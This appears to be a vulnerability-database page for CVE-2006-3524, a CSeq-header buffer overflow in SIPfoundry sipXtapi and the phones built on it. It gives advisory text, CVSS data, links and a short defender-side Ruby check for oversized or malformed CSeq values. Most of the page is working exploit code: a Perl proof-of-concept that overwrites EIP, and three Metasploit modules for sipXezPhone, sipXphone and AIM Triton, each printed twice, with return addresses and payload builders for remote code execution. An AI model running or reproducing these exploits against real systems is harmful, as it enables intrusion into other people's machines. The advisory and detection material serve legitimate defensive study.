CVE-2006-3524
CVSS 7.5
Published: 2006-07-11 20:05:00
Last modified: 2011-03-07 21:38:50

[Original] Buffer overflow in SIPfoundry sipXtapi released before 20060324 allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.


[CNNVD] SIPfoundry sipXtapi malformed CSeq field handling remote buffer overflow vulnerability (CNNVD-200607-149)

        sipXtapi is an easy-to-use software development kit (SDK) for building standalone or embedded SIP clients.
        The sipXtapi library contains a buffer overflow in its parsing of the CSeq field of a request; a remote attacker could exploit it to execute arbitrary instructions on the server.
        A remote attacker can trigger the vulnerability by sending a CSeq field value longer than 24 bytes, which gives control of EIP and allows arbitrary instructions to be executed.
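As an added example that is not part of this record or of sipXtapi or Metasploit, the following Ruby (matching the page's other code) is a defender-side check that classifies the CSeq header of an incoming SIP request; it goes beyond the advisory's 24-byte bound by also checking the RFC 3261 grammar (1*DIGIT LWS Method, sequence number below 2^31) and unfolding continuation lines. The sample messages, the host example.invalid and the function names are constructed for the example.

```ruby
# Added example (not from this record or from sipXtapi/Metasploit): a
# defender-side check that classifies the CSeq header of a SIP request.

# RFC 3261 grammar: CSeq = "CSeq" HCOLON 1*DIGIT LWS Method
CSEQ_RE = /\A(\d+)[ \t]+([A-Za-z]+)\z/

# Length threshold taken from the advisory above: CSeq values longer than
# 24 bytes overflowed the parser in unpatched sipXtapi builds.
MAX_CSEQ_LEN = 24

# Parse the header block of a SIP message into { lowercased_name => [values] }.
# Folded header lines (continuations starting with SP or HT) are unfolded.
def sip_headers(message)
  head = message.split("\r\n\r\n", 2).first
  lines = head.split("\r\n")
  lines.shift # drop the request line
  unfolded = []
  lines.each do |l|
    if l =~ /\A[ \t]/ && !unfolded.empty?
      unfolded[-1] = unfolded[-1] + " " + l.strip
    else
      unfolded << l
    end
  end
  headers = Hash.new { |h, k| h[k] = [] }
  unfolded.each do |l|
    name, value = l.split(":", 2)
    next if value.nil?
    headers[name.strip.downcase] << value.strip
  end
  headers
end

# Classify the CSeq header of one message:
#   :missing   - no CSeq header present
#   :oversize  - a value longer than MAX_CSEQ_LEN (the CVE-2006-3524 trigger)
#   :malformed - not "1*DIGIT LWS Method", or sequence number >= 2**31
#   :ok        - conforms and is within the length bound
def check_cseq(message)
  values = sip_headers(message)["cseq"]
  return :missing if values.empty?
  values.each do |v|
    return :oversize if v.bytesize > MAX_CSEQ_LEN
    m = CSEQ_RE.match(v)
    return :malformed if m.nil? || m[1].to_i >= 2**31
  end
  :ok
end

# Constructed sample messages (not captured traffic); example.invalid is a
# reserved name. The second carries a 40-byte CSeq value, over the bound.
GOOD_INVITE = "INVITE sip:bob@example.invalid SIP/2.0\r\n" \
              "Via: SIP/2.0/UDP 192.0.2.1:5060\r\n" \
              "CSeq: 1 INVITE\r\n\r\n"
LONG_CSEQ = "INVITE sip:bob@example.invalid SIP/2.0\r\n" \
            "CSeq: #{'1' * 40}\r\n\r\n"

puts "good: #{check_cseq(GOOD_INVITE)}   long: #{check_cseq(LONG_CSEQ)}"
```

Dropping or logging any request that classifies as :oversize or :malformed in front of an unpatched SIP stack gives a detection signal for this CVE without depending on the exact overflow offset of a given client.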

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3524
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-149
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2735
(UNKNOWN)  VUPEN  ADV-2006-2735
http://www.securityfocus.com/bid/18906
(UNKNOWN)  BID  18906
http://securitytracker.com/id?1016455
(UNKNOWN)  SECTRACK  1016455
http://secunia.com/advisories/20997
(VENDOR_ADVISORY)  SECUNIA  20997
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047794.html
(UNKNOWN)  FULLDISC  20060711 ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://lists.grok.org.uk/pipermail/full-disclosure/2006-July/047757.html
(UNKNOWN)  FULLDISC  20060710 ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://xforce.iss.net/xforce/xfdb/27681
(UNKNOWN)  XF  sipxtapi-cseq-bo(27681)
http://www.securityfocus.com/archive/1/archive/1/440135/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060711 Re: [Full-disclosure] ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://www.securityfocus.com/archive/1/archive/1/439617/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060710 ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton)
http://www.osvdb.org/27122
(UNKNOWN)  OSVDB  27122

- Vulnerability information

SIPfoundry sipXtapi malformed CSeq field handling remote buffer overflow vulnerability
High  Buffer overflow
2006-07-11 00:00:00 2006-07-18 00:00:00
Remote
        sipXtapi is an easy-to-use software development kit (SDK) for building standalone or embedded SIP clients.
        The sipXtapi library contains a buffer overflow in its parsing of the CSeq field of a request; a remote attacker could exploit it to execute arbitrary instructions on the server.
        A remote attacker can trigger the vulnerability by sending a CSeq field value longer than 24 bytes, which gives control of EIP and allows arbitrary instructions to be executed.

- Advisories and patches

        The vendor has released an upgrade that fixes this issue; download link:
        http://www.sipfoundry.org/index.html

- Vulnerability information (2000)

SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit PoC (EDBID:2000)
hardware dos
2006-07-10 Verified
0 Michael Thumann
N/A
#!/usr/bin/perl
# PoC Exploit By mthumann@ernw.de
# Remote Buffer Overflow in sipXtapi

use IO::Socket;
#use strict;


print "sipXtapi Exploit by Michael Thumann \n\n";

if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>\n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $eip="\x41\x41\x41\x41";
my $cseq =
"\x31\x31\x35\x37\x39\x32\x30\x38".
"\x39\x32\x33\x37\x33\x31\x36\x31".
"\x39\x35\x34\x32\x33\x35\x37\x30".
$eip;
my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";

#EoF

# milw0rm.com [2006-07-10]
		

- Vulnerability information (16351)

SIPfoundry sipXezPhone 0.35a CSeq Field Overflow (EDBID:16351)
windows remote
2010-06-15 Verified
0 metasploit
N/A
##
# $Id: sipxezphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in SIPfoundry's
				sipXezPhone version 0.35a. By sending an long CSeq header,
				a remote attacker could overflow a buffer and execute
				arbitrary code on the system with the privileges of
				the affected application.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					['CVE', '2006-3524'],
					['OSVDB', '27122'],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',

			'Targets'        =>
				[
					['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],
				],

			'Privileged'     => false,

			'DisclosureDate' => 'Jul 10 2006',

			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5060)
			], self.class)
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(260, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[252, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end
		

- Vulnerability information (16352)

SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow (EDBID:16352)
windows remote
2010-06-15 Verified
0 metasploit
N/A
##
# $Id: sipxphone_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in SIPfoundry's
				sipXphone 2.6.0.27. By sending an overly long CSeq value,
				a remote attacker could overflow a buffer and execute
				arbitrary code on the system with the privileges of
				the affected application.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					[ 'CVE', '2006-3524' ],
					[ 'OSVDB', '27122' ],
					[ 'BID', '18906' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 10 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5060)
			], self.class)
	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(212, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[204, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")

		udp_sock.put(sploit)

		handler
		disconnect_udp

	end

end
		

- Vulnerability information (16353)

AIM Triton 1.0.4 CSeq Buffer Overflow (EDBID:16353)
windows remote
2010-06-15 Verified
0 metasploit
N/A
##
# $Id: aim_triton_cseq.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in AOL\'s AIM
				Triton 1.0.4. By sending an overly long CSeq value,
				a remote attacker could overflow a buffer and execute
				arbitrary code on the system with the privileges of
				the affected application.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					['CVE', '2006-3524'],
					['OSVDB', '27122' ],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 10 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5061)
			], self.class)
	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(792, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[780, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")

		udp_sock.put(sploit)

		handler
		disconnect_udp

	end

end
		

- Vulnerability information (F83094)

SIPfoundry sipXezPhone 0.35a CSeq Field Overflow (PacketStormID:F83094)
2009-11-26 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
CVE-2006-3524

This Metasploit module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in SIPfoundry's
				sipXezPhone version 0.35a. By sending an long CSeq header,
				a remote attacker could overflow a buffer and execute 
				arbitrary code on the system with the privileges of 
				the affected application. 
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3524'],
					['OSVDB', '27122'],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],  
				],

			'Privileged'     => false,

			'DisclosureDate' => 'July 10 2006',

			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5060)
			], self.class)
	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s
		filler = rand_text_english(260, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[252, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end
    

- Vulnerability information (F83080)

AIM Triton 1.0.4 CSeq Buffer Overflow (PacketStormID:F83080)
2009-11-26 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
CVE-2006-3524

This Metasploit module exploits a buffer overflow in AOL's AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AIM Triton 1.0.4 CSeq Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in AOL's AIM
				Triton 1.0.4. By sending an overly long CSeq value, 
				a remote attacker could overflow a buffer and execute 
				arbitrary code on the system with the privileges of 
				the affected application. 
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3524'],
					['OSVDB', '27122' ],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll 
				],
			'Privileged'     => false,
			'DisclosureDate' => 'July 10 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5061)
			], self)

	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s      
		filler = rand_text_english(792, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[780, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")
 
		udp_sock.put(sploit)

		handler
		disconnect_udp
                
	end

end
    

- Vulnerability information (F82931)

SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow (PacketStormID:F82931)
2009-10-30 00:00:00
MC  metasploit.com
exploit,remote,overflow,arbitrary
CVE-2006-3524

This Metasploit module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in SIPfoundry's
				sipXphone 2.6.0.27. By sending an overly long CSeq value, 
				a remote attacker could overflow a buffer and execute 
				arbitrary code on the system with the privileges of 
				the affected application. 
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3524'],
					['OSVDB', '27122'],
					['BID', '18906'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x20\x09\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],  
				],
			'Privileged'     => false,
			'DisclosureDate' => 'July 10 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5060)
			], self)

	end

	def exploit
		connect_udp

		user   = rand_text_english(2, payload_badchars)
		port   = rand(65535).to_s      
		filler = rand_text_english(212, payload_badchars)
		seh    = generate_seh_payload(target.ret)
		filler[204, seh.length] = seh

		sploit  =   "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"
		sploit  <<  "To: <sip:#{rhost}:#{rport}>" + "\r\n"
		sploit  <<  "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"
		sploit  <<  "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"
		sploit  <<  "Call-ID: #{(rand(100)+100)}#{rhost}" + "\r\n"
		sploit  <<  "CSeq: " + filler + "\r\n"
		sploit  <<  "Max-Forwards: 20" +  "\r\n"
		sploit  <<  "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"

		print_status("Trying target #{target.name}...")
 
		udp_sock.put(sploit)

		handler
		disconnect_udp
                
	end

end
    

- Vulnerability information

27122
sipXtapi INVITE Message CSeq Field Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

A remote overflow exists in SIPfoundry, Inc. sipXtapi. The program fails to validate the length of the 'CSeq' field of an INVITE message, resulting in a buffer overflow. With a specially crafted message, an attacker can run arbitrary code, resulting in a loss of integrity.

- Timeline

2006-07-10 2006-03-20
2006-07-10 Unknown

- Solution

Upgrade to versions released on or after 2006-03-24, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
